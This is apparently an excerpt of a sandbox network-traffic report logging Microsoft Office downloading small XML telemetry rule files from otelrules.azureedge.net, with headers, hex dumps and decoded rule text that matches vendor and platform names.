                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          47192.168.2.44979913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:44 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:45 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:45 GMT
                          Content-Type: text/xml
                          Content-Length: 404
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                          ETag: "0x8DC582B95C61A3C"
                          x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165645Z-174c587ffdfp4vpjhC1TEBybqw000000067000000000cr73
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:45 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                          Session IDSource IPSource PortDestination IPDestination Port
                          48192.168.2.44980213.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:45 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:45 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:45 GMT
                          Content-Type: text/xml
                          Content-Length: 479
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                          ETag: "0x8DC582BB7D702D0"
                          x-ms-request-id: a94d7e56-901e-0016-7dd1-3eefe9000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165645Z-15b8b599d88hr8sfhC1TEBbca4000000062000000000fst2
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:45 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          49192.168.2.44980013.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:45 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:45 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:45 GMT
                          Content-Type: text/xml
                          Content-Length: 468
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                          ETag: "0x8DC582BB046B576"
                          x-ms-request-id: a7985a29-001e-0046-374c-3cda4b000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165645Z-15b8b599d88pxmdghC1TEBux9c000000068g00000000n6yg
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          50192.168.2.44980113.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:45 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:45 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:45 GMT
                          Content-Type: text/xml
                          Content-Length: 400
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                          ETag: "0x8DC582BB2D62837"
                          x-ms-request-id: 069344af-301e-0020-09c0-3e6299000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165645Z-178bfbc474bv587zhC1NYCny5w00000007g000000000vuxr
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:45 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                          Session IDSource IPSource PortDestination IPDestination Port
                          51192.168.2.44980313.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:47 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:47 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:47 GMT
                          Content-Type: text/xml
                          Content-Length: 425
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                          ETag: "0x8DC582BBA25094F"
                          x-ms-request-id: c6d12e38-b01e-0001-1cfc-3d46e2000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165647Z-178bfbc474bwlrhlhC1NYCy3kg00000007qg00000000kv7y
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:47 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                          Session IDSource IPSource PortDestination IPDestination Port
                          52192.168.2.44980413.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:47 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:47 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:47 GMT
                          Content-Type: text/xml
                          Content-Length: 475
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                          ETag: "0x8DC582BB2BE84FD"
                          x-ms-request-id: 974535d3-001e-002b-30bf-3e99f2000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165647Z-178bfbc474bwlrhlhC1NYCy3kg00000007v0000000001d0y
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:47 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          53192.168.2.44980513.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:47 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:47 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:47 GMT
                          Content-Type: text/xml
                          Content-Length: 448
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                          ETag: "0x8DC582BB389F49B"
                          x-ms-request-id: 8a9c0054-c01e-0046-231b-3e2db9000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165647Z-178bfbc474bw8bwphC1NYC38b400000007p0000000003u8k
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:47 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                          Session IDSource IPSource PortDestination IPDestination Port
                          54192.168.2.44980613.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:47 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:48 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:48 GMT
                          Content-Type: text/xml
                          Content-Length: 491
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                          ETag: "0x8DC582B98B88612"
                          x-ms-request-id: 9a08bc20-501e-00a0-39ae-3e9d9f000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165648Z-178bfbc474bh5zbqhC1NYCkdug00000007qg0000000093h8
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:48 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          55192.168.2.44980713.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:47 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:48 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:48 GMT
                          Content-Type: text/xml
                          Content-Length: 416
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                          ETag: "0x8DC582BAEA4B445"
                          x-ms-request-id: ecf1de78-401e-0047-5d4b-3c8597000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165648Z-15b8b599d885ffrhhC1TEBtuv0000000065g00000000thxr
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:48 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                          Session IDSource IPSource PortDestination IPDestination Port
                          56192.168.2.44980813.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:49 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:49 UTC471INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:49 GMT
                          Content-Type: text/xml
                          Content-Length: 479
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                          ETag: "0x8DC582B989EE75B"
                          x-ms-request-id: a4f13e39-401e-008c-745b-3f86c2000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165649Z-178bfbc474brk967hC1NYCfu6000000007n0000000003bzf
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_MISS
                          Accept-Ranges: bytes
                          2024-11-25 16:56:49 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          57192.168.2.44981013.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:49 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:50 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:49 GMT
                          Content-Type: text/xml
                          Content-Length: 471
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                          ETag: "0x8DC582B97E6FCDD"
                          x-ms-request-id: 3b324e0c-901e-008f-425c-3d67a6000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165649Z-15b8b599d88hd9g7hC1TEBp75c0000000680000000005fut
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
                          2024-11-25 16:56:50 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                          Session IDSource IPSource PortDestination IPDestination Port
                          58192.168.2.44980913.107.246.63443
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:56:49 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                          Connection: Keep-Alive
                          Accept-Encoding: gzip
                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                          Host: otelrules.azureedge.net
                          2024-11-25 16:56:50 UTC470INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:56:50 GMT
                          Content-Type: text/xml
                          Content-Length: 415
                          Connection: close
                          Cache-Control: public, max-age=604800, immutable
                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                          ETag: "0x8DC582BA80D96A1"
                          x-ms-request-id: a51f3b57-a01e-0021-27a4-3e814c000000
                          x-ms-version: 2018-03-28
                          x-azure-ref: 20241125T165650Z-178bfbc474bbbqrhhC1NYCvw7400000007u000000000qey6
                          x-fd-int-roxy-purgeid: 0
                          X-Cache: TCP_HIT
                          Accept-Ranges: bytes
